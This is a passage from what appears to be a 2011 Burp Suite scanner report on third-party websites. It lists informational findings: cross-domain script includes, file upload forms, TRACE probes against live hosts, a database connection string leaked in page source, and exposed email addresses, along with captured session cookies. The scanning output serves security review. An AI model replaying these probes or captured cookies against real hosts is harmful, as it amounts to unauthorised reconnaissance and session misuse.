X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=02cqtyvthyh3kbzxkedpaqwg; path=/; HttpOnly
Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Mon, 25-Apr-2011 18:46:19 GMT; path=/
Set-Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; domain=realtor.com; path=/
Set-Cookie: recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; domain=realtor.com; path=/
Set-Cookie: RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1; domain=realtor.com; expires=Thu, 26-Apr-2012 18:46:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 69807
Content-Length: 69807


<!DOCTYPE html>
<!--[if gte IE 8]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE IE8 IE6+ IE7+ IE8+ IE8-"><![endif]-->
<!--[if IE 7]><html xmlns="http://www.w3.org/19
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.move.com/lib/rdc/6.0.10_P1A/common.js'></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.move.com/rdc/v6/fah/js/nc/s_code_RDC_FAH04.js"></script>
...[SNIP]...
<!-- End SiteCatalyst code version: H.2. -->


<script type='text/javascript' src='http://mdctrail.com/mvTracker.ashx?redux_v2'></script>
<script type='text/javascript' src='http://static.move.com/lib/rdc/6.0.10_P1A//mainsearchxslcontainer.js'></script>
...[SNIP]...

20.87. http://www.widgetbox.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:09 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=790842FDB2C0593350777C792C89D949; Path=/, node=1026; path=/
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.88. http://www.widgetbox.com/list/most_popular  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /list/most_popular

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /list/most_popular HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:10 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...
</script>


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/Main.js?48996"></script>
...[SNIP]...
<div class="badge" style="margin:-3px auto 9px;"><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...
<div class="module-content">


<script type="text/javascript" src="http://widgetserver.com/syndication/subscriber/InsertPanel.js?panelId=0ed14c91-dfd4-497f-b04b-3d371abe7a5e"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.89. http://www.widgetbox.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/ HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.4.10.1303854385; km_vs=1; km_lv=1303854392; km_uq=; node=1025

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:48:12 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://pub3.widgetbox.com/css/features.css?48996" />


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/Main.js?48996"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.90. http://www.widgetbox.com/mobile/builder/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /mobile/builder/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/builder/ HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; node=1025

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:13 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://pub4.widgetbox.com/css/mobile_app_editor.css?48996"/>


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/Main.js?48996"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.91. http://www.widgetbox.com/widgets/make/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.widgetbox.com
Path:   /widgets/make/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/make/ HTTP/1.1
Host: www.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.5.10.1303854385; km_vs=1; km_lv=1303854422; node=1025; km_uq=

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:52:07 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: text/html;charset=UTF-8



...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://pub1.widgetbox.com/css/make.css?48996" />


<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/Main.js?48996"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21. File upload functionality  previous  next
There are 2 instances of this issue:


21.1. http://mediacdn.disqus.com/1303851120/build/system/upload.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1303851120/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /1303851120/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1303613708.3.3.utmcsr=star-telegram.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/04/23/3022014/your-smartphone-knows-where-youve.html; __utma=113869458.1602204697.1303349184.1303525739.1303613708.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 21:20:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2370935218
Cache-Control: max-age=2591000
Expires: Thu, 26 May 2011 21:34:00 GMT
Date: Tue, 26 Apr 2011 21:50:40 GMT
Connection: close
Content-Length: 13024

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...
<!-- dynamic -->
<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...

21.2. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /iframe/recommendedcvupload.aspx

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1
Host: www.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL48
Date: Tue, 26 Apr 2011 18:40:29 GMT
Connection: close
Content-Length: 45725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Find J
...[SNIP]...
</label>
<input name="jrupload:_fileResume" type="file" id="jrupload__fileResume" tabIndex="1" onKeyPress="return noenter();" accept="application/msword,text/*" />
</div>
...[SNIP]...

22. TRACE method is enabled  previous  next
There are 3 instances of this issue:


22.1. http://amch.questionmarket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: c95b3ad3fb338d9e

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Apache/2.2.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: c95b3ad3fb338d9e
Connection: Keep-Alive


22.2. http://tracking.hubspot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.hubspot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: e6e623cc8f2edbab

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:13:06 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: e6e623cc8f2edbab


22.3. http://www.bertelsmann.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bertelsmann.com
Cookie: fb5970cf2421ccdb

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:05 GMT
Server: Apache/2.2.15 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bertelsmann.com
Cookie: fb5970cf2421ccdb


23. Database connection string disclosed  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following database connection string was disclosed in the response:

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")
   sconnString = "Provider=SQLOLEDB.1;Password=" & sTalismaPwd & ";Persist Security Info=True;User ID="& sTalismaUserName & ";Initial Catalog=" & sTalismaDBName & ";Data Source=" &sTalismaServerName

   objADOConnection.Open sconnString
   Call Chec
...[SNIP]...

24. Email addresses disclosed  previous  next
There are 64 instances of this issue:


24.1. http://ads1.msn.com/ads/abuimg/clear1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /ads/abuimg/clear1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ads/abuimg/clear1.gif HTTP/1.1
Host: ads1.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:35:31 GMT
Expires: Fri, 02 Mar 2012 03:05:45 GMT
Last-Modified: Tue, 15 Feb 2000 02:13:30 GMT
Cache-Control: max-age=31449600
Content-Type: image/gif
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Content-Length: 85

GIF89a.......................................................!.......,........@...E.;

24.2. http://ads1.msn.com/library/dap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dap.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF
If-Modified-Since: Tue, 15 Mar 2011 19:10:43 GMT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:37:01 GMT
Expires: Wed, 27 Apr 2011 09:48:10 GMT
Last-Modified: Tue, 15 Mar 2011 19:10:43 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13786


var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

24.3. http://ads1.msn.com/library/dapmsn.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /library/dapmsn.js

Issue detail

The following email address was disclosed in the response:

Request

GET /library/dapmsn.js HTTP/1.1
Host: ads1.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; Sample=37; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2
If-Modified-Since: Mon, 07 Mar 2011 20:09:30 GMT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:37:00 GMT
Expires: Thu, 17 Mar 2011 19:42:44 GMT
Last-Modified: Mon, 07 Mar 2011 20:09:30 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 3855

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

24.4. http://advertising.microsoft.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /home

Issue detail

The following email address was disclosed in the response:

Request

GET /home?s_cid=us_msn_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; 18987408-VID=16601209214853; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649894761:ss=1303649859266

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:44:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_msn_footer; path=/
Set-Cookie: MarketToggleClosedTest=; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Set-Cookie: MarketToggleRenderMethod=STATICADVERTISING.MICROSOFT.COM; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:44:44 GMT
Content-Length: 70966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<a href="mailto:nzsales@ninemsn.com.au" title="mailto:nzsales@ninemsn.com.au" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: New Zealand" omniture_products="market selector" target="_blank">
...[SNIP]...

24.5. http://blog.widgetbox.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.widgetbox.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: blog.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; km_vs=1; km_lv=1303854422; km_uq=; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.6.10.1303854385

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=6FF6422B75DF69D5F6D78A9CC3151614.web125; Path=/; HttpOnly
X-ServedBy: web125
Set-Cookie: ss_lastvisit=1303854731302; Expires=Fri, 23-Apr-2021 21:52:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Apr 2011 21:52:10 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=2097260736.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 44235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...
<a href="info@flite.com">
...[SNIP]...

24.6. http://cdn.widgetserver.com/syndication/mobilejs/mapp_future.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/mobilejs/mapp_future.js

Issue detail

The following email address was disclosed in the response:

Request

GET /syndication/mobilejs/mapp_future.js?48996 HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe?widget.appId=3651dbe5-aec4-42b2-8270-d62db9a25bfe&widget.regId=6ba05ce8-62f3-46d0-bb21-b5f833b4817f&widget.friendlyId=msite-ext&widget.name=Mobile%20Web%20App&widget.token=34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211&widget.sid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.vid=a421bc15422e4aa32fb9e2416e0bd7cc&widget.id=0&widget.location=http%3A%2F%2Fwww.widgetbox.com%2Fmobile%2Fbuilder%2F&widget.timestamp=1303854400940&widget.serviceLevel=0&widget.provServiceLevel=2&widget.instServiceLevel=1&widget.width=320&widget.height=460&widget.wrapper=JAVASCRIPT&widget.isAdFriendly=false&widget.isAdEnabled=false&widget.adChannels=&widget.adPlacement=&widget.prototype=MOBILE_APP&widget.ua=mozilla%2F5.0%20%28windows%3B%20u%3B%20windows%20nt%206.1%3B%20en-us%29%20applewebkit%2F534.16%20%28khtml%2C%20like%20gecko%29%20chrome%2F10.0.648.205%20safari%2F534.16&widget.version=5&widget.output=htmlcontent&widget.appPK=145923021&widget.regPK=4248409&widget.providerPK=1860293&widget.userPK=67922830
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript;charset=UTF-8
Date: Tue, 26 Apr 2011 21:47:53 GMT
Expires: Wed, 06 Jan 2021 21:19:31 GMT
